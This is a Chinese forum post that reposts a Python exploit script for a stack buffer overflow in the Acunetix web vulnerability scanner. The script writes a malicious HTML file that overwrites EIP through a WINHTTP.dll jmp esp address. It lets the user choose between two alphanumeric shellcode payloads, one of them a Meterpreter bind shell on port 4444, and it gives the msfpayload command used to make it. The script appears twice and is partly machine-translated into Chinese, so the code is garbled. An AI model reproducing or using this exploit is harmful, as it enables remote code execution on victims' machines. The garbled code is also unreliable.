Acunetix远程基于堆栈溢出漏洞
Acunetix远程基于堆栈溢出漏洞
由 Admin 周四 五月 11, 2017 12:13 pm
在一个服务器主机生成的文件。 受害者应该选择外部主机。 否则我们不能触发
的弱点。
“‘
打印('(~)Acunetix Web漏洞扫描器缓冲区溢出利用/ n”)
而真正的:
试一试:
choice = int(raw_input("[?] Choose your payload:/n1. Calculator/n2. Bind Shell/n"))
except ValueError:
print "[!] Enter only a number"
continue
if choice == 1:
shellcode = ""
shellcode += "/x54/x59/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49"
shellcode += "/x49/x49/x49/x49/x49/x37/x51/x5a/x6a/x41/x58/x50/x30"
shellcode += "/x41/x30/x41/x6b/x41/x41/x51/x32/x41/x42/x32/x42/x42"
shellcode += "/x30/x42/x42/x41/x42/x58/x50/x38/x41/x42/x75/x4a/x49"
shellcode += "/x49/x6c/x6d/x38/x6e/x69/x75/x50/x73/x30/x77/x70/x63"
shellcode += "/x50/x6f/x79/x68/x65/x30/x31/x49/x42/x63/x54/x4c/x4b"
shellcode += "/x31/x42/x46/x50/x4c/x4b/x46/x32/x44/x4c/x6e/x6b/x70"
shellcode += "/x52/x46/x74/x4c/x4b/x64/x32/x34/x68/x64/x4f/x4e/x57"
shellcode += "/x30/x4a/x35/x76/x66/x51/x69/x6f/x64/x71/x69/x50/x6e"
shellcode += "/x4c/x65/x6c/x71/x71/x61/x6c/x77/x72/x74/x6c/x31/x30"
shellcode += "/x69/x51/x4a/x6f/x54/x4d/x53/x31/x69/x57/x39/x72/x58"
shellcode += "/x70/x71/x42/x53/x67/x6e/x6b/x63/x62/x74/x50/x6e/x6b"
shellcode += "/x53/x72/x57/x4c/x77/x71/x48/x50/x6c/x4b/x37/x30/x31"
shellcode += "/x68/x4e/x65/x4b/x70/x43/x44/x31/x5a/x36/x61/x58/x50"
shellcode += "/x62/x70/x6c/x4b/x31/x58/x34/x58/x6e/x6b/x42/x78/x77"
shellcode += "/x50/x36/x61/x38/x53/x6b/x53/x67/x4c/x57/x39/x4e/x6b"
shellcode += "/x77/x44/x4e/x6b/x47/x71/x69/x46/x34/x71/x49/x6f/x64"
shellcode += "/x71/x39/x50/x6c/x6c/x6f/x31/x7a/x6f/x46/x6d/x47/x71"
shellcode += "/x69/x57/x35/x68/x59/x70/x71/x65/x49/x64/x57/x73/x33"
shellcode += "/x4d/x6a/x58/x35/x6b/x43/x4d/x67/x54/x31/x65/x6d/x32"
shellcode += "/x61/x48/x6c/x4b/x51/x48/x34/x64/x66/x61/x6e/x33/x35"
shellcode += "/x36/x6c/x4b/x66/x6c/x30/x4b/x4e/x6b/x43/x68/x45/x4c"
shellcode += "/x33/x31/x4a/x73/x4c/x4b/x53/x34/x4e/x6b/x53/x31/x4e"
shellcode += "/x30/x4c/x49/x37/x34/x54/x64/x54/x64/x73/x6b/x31/x4b"
shellcode += "/x31/x71/x52/x79/x42/x7a/x53/x61/x79/x6f/x69/x70/x42"
shellcode += "/x78/x63/x6f/x43/x6a/x6c/x4b/x77/x62/x7a/x4b/x6c/x46"
shellcode += "/x53/x6d/x70/x6a/x57/x71/x4c/x4d/x4e/x65/x6e/x59/x53"
shellcode += "/x30/x45/x50/x47/x70/x52/x70/x52/x48/x44/x71/x6e/x6b"
shellcode += "/x42/x4f/x4b/x37/x6b/x4f/x78/x55/x4d/x6b/x6b/x50/x45"
shellcode += "/x4d/x56/x4a/x47/x7a/x50/x68/x4f/x56/x4e/x75/x6f/x4d"
shellcode += "/x4f/x6d/x59/x6f/x68/x55/x77/x4c/x46/x66/x51/x6c/x65"
shellcode += "/x5a/x6d/x50/x6b/x4b/x4b/x50/x44/x35/x56/x65/x6f/x4b"
shellcode += "/x71/x57/x64/x53/x54/x32/x42/x4f/x53/x5a/x33/x30/x61"
shellcode += "/x43/x49/x6f/x68/x55/x33/x53/x33/x51/x52/x4c/x43/x53"
shellcode += "/x65/x50/x41/x41"
break
elif choice == 2:
# Modify this part with your own custom shellcode
# msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP
shellcode = ""
shellcode += "/x54/x59/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49"
shellcode += "/x49/x49/x49/x49/x49/x37/x51/x5a/x6a/x41/x58/x50/x30"
shellcode += "/x41/x30/x41/x6b/x41/x41/x51/x32/x41/x42/x32/x42/x42"
shellcode += "/x30/x42/x42/x41/x42/x58/x50/x38/x41/x42/x75/x4a/x49"
shellcode += "/x69/x6c/x4b/x58/x6c/x49/x65/x50/x73/x30/x73/x30/x31"
shellcode += "/x70/x6e/x69/x48/x65/x70/x31/x59/x42/x55/x34/x4c/x4b"
shellcode += "/x42/x72/x76/x50/x6c/x4b/x73/x62/x76/x6c/x4c/x4b/x53"
shellcode += "/x62/x57/x64/x6e/x6b/x63/x42/x34/x68/x66/x6f/x48/x37"
shellcode += "/x30/x4a/x54/x66/x55/x61/x79/x6f/x55/x61/x4b/x70/x4c"
shellcode += "/x6c/x35/x6c/x30/x61/x33/x4c/x75/x52/x64/x6c/x67/x50"
shellcode += "/x6f/x31/x5a/x6f/x54/x4d/x47/x71/x48/x47/x6b/x52/x38"
shellcode += "/x70/x61/x42/x46/x37/x6e/x6b/x32/x72/x66/x70/x6e/x6b"
shellcode += "/x73/x72/x75/x6c/x73/x31/x4e/x30/x6e/x6b/x71/x50/x43"
shellcode += "/x48/x4b/x35/x49/x50/x61/x64/x72/x6a/x33/x31/x78/x50"
shellcode += "/x76/x30/x4c/x4b/x77/x38/x35/x48/x6e/x6b/x53/x68/x61"
shellcode += "/x30/x65/x51/x5a/x73/x69/x73/x77/x4c/x50/x49/x4e/x6b"
shellcode += "/x56/x54/x6e/x6b/x45/x51/x69/x46/x75/x61/x6b/x4f/x66"
shellcode += "/x51/x49/x50/x6c/x6c/x4b/x71/x78/x4f/x56/x6d/x35/x51"
shellcode += "/x4a/x67/x50/x38/x59/x70/x61/x65/x39/x64/x67/x73/x31"
shellcode += "/x6d/x6a/x58/x45/x6b/x43/x4d/x76/x44/x50/x75/x49/x72"
shellcode += "/x52/x78/x6e/x6b/x61/x48/x46/x44/x43/x31/x68/x53/x45"
shellcode += "/x36/x4e/x6b/x34/x4c/x42/x6b/x6e/x6b/x73/x68/x35/x4c"
shellcode += "/x57/x71/x6b/x63/x4c/x4b/x53/x34/x6c/x4b/x43/x31/x4e"
shellcode += "/x30/x4e/x69/x32/x64/x47/x54/x56/x44/x73/x6b/x61/x4b"
shellcode += "/x75/x31/x31/x49/x72/x7a/x76/x31/x59/x6f/x59/x70/x61"
shellcode += "/x48/x51/x4f/x31/x4a/x6c/x4b/x52/x32/x78/x6b/x6e/x66"
shellcode += "/x43/x6d/x42/x48/x67/x43/x45/x62/x37/x70/x63/x30/x72"
shellcode += "/x48/x42/x57/x32/x53/x76/x52/x31/x4f/x42/x74/x50/x68"
shellcode += "/x52/x6c/x64/x37/x64/x66/x44/x47/x39/x6f/x69/x45/x4d"
shellcode += "/x68/x5a/x30/x65/x51/x57/x70/x63/x30/x76/x49/x59/x54"
shellcode += "/x31/x44/x52/x70/x45/x38/x64/x69/x4f/x70/x50/x6b/x57"
shellcode += "/x70/x59/x6f/x7a/x75/x52/x70/x52/x70/x32/x70/x52/x70"
shellcode += "/x47/x30/x30/x50/x67/x30/x66/x30/x63/x58/x48/x6a/x54"
shellcode += "/x4f/x49/x4f/x69/x70/x79/x6f/x4e/x35/x4c/x57/x45/x61"
shellcode += "/x6b/x6b/x51/x43/x73/x58/x73/x32/x57/x70/x34/x51/x73"
shellcode += "/x6c/x6f/x79/x4a/x46/x42/x4a/x76/x70/x46/x36/x50/x57"
shellcode += "/x71/x78/x7a/x62/x4b/x6b/x70/x37/x72/x47/x6b/x4f/x48"
shellcode += "/x55/x62/x73/x51/x47/x72/x48/x4c/x77/x78/x69/x47/x48"
shellcode += "/x4b/x4f/x69/x6f/x48/x55/x30/x53/x52/x73/x53/x67/x45"
shellcode += "/x38/x62/x54/x5a/x4c/x67/x4b/x6d/x31/x69/x6f/x5a/x75"
shellcode += "/x72/x77/x6c/x57/x62/x48/x54/x35/x50/x6e/x32/x6d/x35"
shellcode += "/x31/x4b/x4f/x69/x45/x61/x7a/x77/x70/x32/x4a/x73/x34"
shellcode += "/x62/x76/x61/x47/x70/x68/x63/x32/x78/x59/x4a/x68/x31"
shellcode += "/x4f/x49/x6f/x48/x55/x6e/x6b/x46/x56/x51/x7a/x71/x50"
shellcode += "/x62/x48/x65/x50/x46/x70/x63/x30/x43/x30/x31/x46/x32"
shellcode += "/x4a/x55/x50/x71/x78/x31/x48/x49/x34/x66/x33/x6b/x55"
shellcode += "/x59/x6f/x4e/x35/x4f/x63/x72/x73/x71/x7a/x37/x70/x30"
shellcode += "/x56/x70/x53/x71/x47/x45/x38/x74/x42/x38/x59/x6f/x38"
shellcode += "/x33/x6f/x49/x6f/x69/x45/x67/x71/x79/x53/x76/x49/x6b"
shellcode += "/x76/x6f/x75/x48/x76/x62/x55/x58/x6c/x49/x53/x41/x41"
print "[+] Connect on port 4444"
break
else:
print "[-] Invalid Choice"
继续
头=(“< html > /
<身体> /
<中心> < h1 >浏览这个网站,很差
< / h1 > < /中心> < br >”)
垃圾=(“/
< a href = [要查看本链接请先注册并登录] / /”
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /
AAAAAAA”)
edx = " 500 f "
junk2 = " BBBB "
# jmp esp | asciiprint、ascii alphanum { PAGE_EXECUTE_READ }[WINHTTP。 dll]将来:假的,变基:假,SafeSEH:真的,OS:真的,v5.1.2600.2180(C:/ WINDOWS / system32 / WINHTTP.dll)
eip = " / x49 / x63 / x52 / x4d”
shellcode + = " / " > "
尾=(“< img src = / " [要查看本链接请先注册并登录] / " > /
< /身体> /
< / html >”)
利用垃圾+ edx + junk2 =头+ + eip + shellcode +尾巴
文件名= " Exploit.htm "
文件=打开(文件名,“w”)
file.write(利用)
file.close()
打印”(~)”+ str(len(利用))+“字节写入文件”
# EOF
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -代码结束- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
的弱点。
“‘
打印('(~)Acunetix Web漏洞扫描器缓冲区溢出利用/ n”)
而真正的:
试一试:
choice = int(raw_input("[?] Choose your payload:/n1. Calculator/n2. Bind Shell/n"))
except ValueError:
print "[!] Enter only a number"
continue
if choice == 1:
shellcode = ""
shellcode += "/x54/x59/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49"
shellcode += "/x49/x49/x49/x49/x49/x37/x51/x5a/x6a/x41/x58/x50/x30"
shellcode += "/x41/x30/x41/x6b/x41/x41/x51/x32/x41/x42/x32/x42/x42"
shellcode += "/x30/x42/x42/x41/x42/x58/x50/x38/x41/x42/x75/x4a/x49"
shellcode += "/x49/x6c/x6d/x38/x6e/x69/x75/x50/x73/x30/x77/x70/x63"
shellcode += "/x50/x6f/x79/x68/x65/x30/x31/x49/x42/x63/x54/x4c/x4b"
shellcode += "/x31/x42/x46/x50/x4c/x4b/x46/x32/x44/x4c/x6e/x6b/x70"
shellcode += "/x52/x46/x74/x4c/x4b/x64/x32/x34/x68/x64/x4f/x4e/x57"
shellcode += "/x30/x4a/x35/x76/x66/x51/x69/x6f/x64/x71/x69/x50/x6e"
shellcode += "/x4c/x65/x6c/x71/x71/x61/x6c/x77/x72/x74/x6c/x31/x30"
shellcode += "/x69/x51/x4a/x6f/x54/x4d/x53/x31/x69/x57/x39/x72/x58"
shellcode += "/x70/x71/x42/x53/x67/x6e/x6b/x63/x62/x74/x50/x6e/x6b"
shellcode += "/x53/x72/x57/x4c/x77/x71/x48/x50/x6c/x4b/x37/x30/x31"
shellcode += "/x68/x4e/x65/x4b/x70/x43/x44/x31/x5a/x36/x61/x58/x50"
shellcode += "/x62/x70/x6c/x4b/x31/x58/x34/x58/x6e/x6b/x42/x78/x77"
shellcode += "/x50/x36/x61/x38/x53/x6b/x53/x67/x4c/x57/x39/x4e/x6b"
shellcode += "/x77/x44/x4e/x6b/x47/x71/x69/x46/x34/x71/x49/x6f/x64"
shellcode += "/x71/x39/x50/x6c/x6c/x6f/x31/x7a/x6f/x46/x6d/x47/x71"
shellcode += "/x69/x57/x35/x68/x59/x70/x71/x65/x49/x64/x57/x73/x33"
shellcode += "/x4d/x6a/x58/x35/x6b/x43/x4d/x67/x54/x31/x65/x6d/x32"
shellcode += "/x61/x48/x6c/x4b/x51/x48/x34/x64/x66/x61/x6e/x33/x35"
shellcode += "/x36/x6c/x4b/x66/x6c/x30/x4b/x4e/x6b/x43/x68/x45/x4c"
shellcode += "/x33/x31/x4a/x73/x4c/x4b/x53/x34/x4e/x6b/x53/x31/x4e"
shellcode += "/x30/x4c/x49/x37/x34/x54/x64/x54/x64/x73/x6b/x31/x4b"
shellcode += "/x31/x71/x52/x79/x42/x7a/x53/x61/x79/x6f/x69/x70/x42"
shellcode += "/x78/x63/x6f/x43/x6a/x6c/x4b/x77/x62/x7a/x4b/x6c/x46"
shellcode += "/x53/x6d/x70/x6a/x57/x71/x4c/x4d/x4e/x65/x6e/x59/x53"
shellcode += "/x30/x45/x50/x47/x70/x52/x70/x52/x48/x44/x71/x6e/x6b"
shellcode += "/x42/x4f/x4b/x37/x6b/x4f/x78/x55/x4d/x6b/x6b/x50/x45"
shellcode += "/x4d/x56/x4a/x47/x7a/x50/x68/x4f/x56/x4e/x75/x6f/x4d"
shellcode += "/x4f/x6d/x59/x6f/x68/x55/x77/x4c/x46/x66/x51/x6c/x65"
shellcode += "/x5a/x6d/x50/x6b/x4b/x4b/x50/x44/x35/x56/x65/x6f/x4b"
shellcode += "/x71/x57/x64/x53/x54/x32/x42/x4f/x53/x5a/x33/x30/x61"
shellcode += "/x43/x49/x6f/x68/x55/x33/x53/x33/x51/x52/x4c/x43/x53"
shellcode += "/x65/x50/x41/x41"
break
elif choice == 2:
# Modify this part with your own custom shellcode
# msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP
shellcode = ""
shellcode += "/x54/x59/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49"
shellcode += "/x49/x49/x49/x49/x49/x37/x51/x5a/x6a/x41/x58/x50/x30"
shellcode += "/x41/x30/x41/x6b/x41/x41/x51/x32/x41/x42/x32/x42/x42"
shellcode += "/x30/x42/x42/x41/x42/x58/x50/x38/x41/x42/x75/x4a/x49"
shellcode += "/x69/x6c/x4b/x58/x6c/x49/x65/x50/x73/x30/x73/x30/x31"
shellcode += "/x70/x6e/x69/x48/x65/x70/x31/x59/x42/x55/x34/x4c/x4b"
shellcode += "/x42/x72/x76/x50/x6c/x4b/x73/x62/x76/x6c/x4c/x4b/x53"
shellcode += "/x62/x57/x64/x6e/x6b/x63/x42/x34/x68/x66/x6f/x48/x37"
shellcode += "/x30/x4a/x54/x66/x55/x61/x79/x6f/x55/x61/x4b/x70/x4c"
shellcode += "/x6c/x35/x6c/x30/x61/x33/x4c/x75/x52/x64/x6c/x67/x50"
shellcode += "/x6f/x31/x5a/x6f/x54/x4d/x47/x71/x48/x47/x6b/x52/x38"
shellcode += "/x70/x61/x42/x46/x37/x6e/x6b/x32/x72/x66/x70/x6e/x6b"
shellcode += "/x73/x72/x75/x6c/x73/x31/x4e/x30/x6e/x6b/x71/x50/x43"
shellcode += "/x48/x4b/x35/x49/x50/x61/x64/x72/x6a/x33/x31/x78/x50"
shellcode += "/x76/x30/x4c/x4b/x77/x38/x35/x48/x6e/x6b/x53/x68/x61"
shellcode += "/x30/x65/x51/x5a/x73/x69/x73/x77/x4c/x50/x49/x4e/x6b"
shellcode += "/x56/x54/x6e/x6b/x45/x51/x69/x46/x75/x61/x6b/x4f/x66"
shellcode += "/x51/x49/x50/x6c/x6c/x4b/x71/x78/x4f/x56/x6d/x35/x51"
shellcode += "/x4a/x67/x50/x38/x59/x70/x61/x65/x39/x64/x67/x73/x31"
shellcode += "/x6d/x6a/x58/x45/x6b/x43/x4d/x76/x44/x50/x75/x49/x72"
shellcode += "/x52/x78/x6e/x6b/x61/x48/x46/x44/x43/x31/x68/x53/x45"
shellcode += "/x36/x4e/x6b/x34/x4c/x42/x6b/x6e/x6b/x73/x68/x35/x4c"
shellcode += "/x57/x71/x6b/x63/x4c/x4b/x53/x34/x6c/x4b/x43/x31/x4e"
shellcode += "/x30/x4e/x69/x32/x64/x47/x54/x56/x44/x73/x6b/x61/x4b"
shellcode += "/x75/x31/x31/x49/x72/x7a/x76/x31/x59/x6f/x59/x70/x61"
shellcode += "/x48/x51/x4f/x31/x4a/x6c/x4b/x52/x32/x78/x6b/x6e/x66"
shellcode += "/x43/x6d/x42/x48/x67/x43/x45/x62/x37/x70/x63/x30/x72"
shellcode += "/x48/x42/x57/x32/x53/x76/x52/x31/x4f/x42/x74/x50/x68"
shellcode += "/x52/x6c/x64/x37/x64/x66/x44/x47/x39/x6f/x69/x45/x4d"
shellcode += "/x68/x5a/x30/x65/x51/x57/x70/x63/x30/x76/x49/x59/x54"
shellcode += "/x31/x44/x52/x70/x45/x38/x64/x69/x4f/x70/x50/x6b/x57"
shellcode += "/x70/x59/x6f/x7a/x75/x52/x70/x52/x70/x32/x70/x52/x70"
shellcode += "/x47/x30/x30/x50/x67/x30/x66/x30/x63/x58/x48/x6a/x54"
shellcode += "/x4f/x49/x4f/x69/x70/x79/x6f/x4e/x35/x4c/x57/x45/x61"
shellcode += "/x6b/x6b/x51/x43/x73/x58/x73/x32/x57/x70/x34/x51/x73"
shellcode += "/x6c/x6f/x79/x4a/x46/x42/x4a/x76/x70/x46/x36/x50/x57"
shellcode += "/x71/x78/x7a/x62/x4b/x6b/x70/x37/x72/x47/x6b/x4f/x48"
shellcode += "/x55/x62/x73/x51/x47/x72/x48/x4c/x77/x78/x69/x47/x48"
shellcode += "/x4b/x4f/x69/x6f/x48/x55/x30/x53/x52/x73/x53/x67/x45"
shellcode += "/x38/x62/x54/x5a/x4c/x67/x4b/x6d/x31/x69/x6f/x5a/x75"
shellcode += "/x72/x77/x6c/x57/x62/x48/x54/x35/x50/x6e/x32/x6d/x35"
shellcode += "/x31/x4b/x4f/x69/x45/x61/x7a/x77/x70/x32/x4a/x73/x34"
shellcode += "/x62/x76/x61/x47/x70/x68/x63/x32/x78/x59/x4a/x68/x31"
shellcode += "/x4f/x49/x6f/x48/x55/x6e/x6b/x46/x56/x51/x7a/x71/x50"
shellcode += "/x62/x48/x65/x50/x46/x70/x63/x30/x43/x30/x31/x46/x32"
shellcode += "/x4a/x55/x50/x71/x78/x31/x48/x49/x34/x66/x33/x6b/x55"
shellcode += "/x59/x6f/x4e/x35/x4f/x63/x72/x73/x71/x7a/x37/x70/x30"
shellcode += "/x56/x70/x53/x71/x47/x45/x38/x74/x42/x38/x59/x6f/x38"
shellcode += "/x33/x6f/x49/x6f/x69/x45/x67/x71/x79/x53/x76/x49/x6b"
shellcode += "/x76/x6f/x75/x48/x76/x62/x55/x58/x6c/x49/x53/x41/x41"
print "[+] Connect on port 4444"
break
else:
print "[-] Invalid Choice"
继续
头=(“< html > /
<身体> /
<中心> < h1 >浏览这个网站,很差
< / h1 > < /中心> < br >”) 垃圾=(“/
< a href = [要查看本链接请先注册并登录] / /”
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /
AAAAAAA”)
edx = " 500 f "
junk2 = " BBBB "
# jmp esp | asciiprint、ascii alphanum { PAGE_EXECUTE_READ }[WINHTTP。 dll]将来:假的,变基:假,SafeSEH:真的,OS:真的,v5.1.2600.2180(C:/ WINDOWS / system32 / WINHTTP.dll)
eip = " / x49 / x63 / x52 / x4d”
shellcode + = " / " > "
尾=(“< img src = / " [要查看本链接请先注册并登录] / " > /
< /身体> /
< / html >”)
利用垃圾+ edx + junk2 =头+ + eip + shellcode +尾巴
文件名= " Exploit.htm "
文件=打开(文件名,“w”)
file.write(利用)
file.close()
打印”(~)”+ str(len(利用))+“字节写入文件”
# EOF
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -代码结束- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Admin- Admin
- 帖子数 : 39
注册日期 : 17-05-09
年龄 : 36 -
您在这个论坛的权限:
您不能在这个论坛回复主题
» SUPERSTAR GROUP 2018 - 潘雪俪 Celine Diora 【迎春花/爆竹一声大地春】
» 鍾明秋---人生何處不相逢
» 越南語翻唱 刘小慧 初戀情人 Giọt Mưa Cuối Thu Thanh Hà
» 越南語翻唱 S H E 不想長大 Trái Tim Vẫn Chờ Vân Thảo
» 越南語翻唱 驛動的心 Dù Chỉ Là Phút Giây Tâm
» 加多一点点 ------------------苏家玉
» 越南語翻唱 甜蜜蜜 Nụ Cười Xinh Như Quỳnh 4K視頻
» 【渗透神器系列】搜索引擎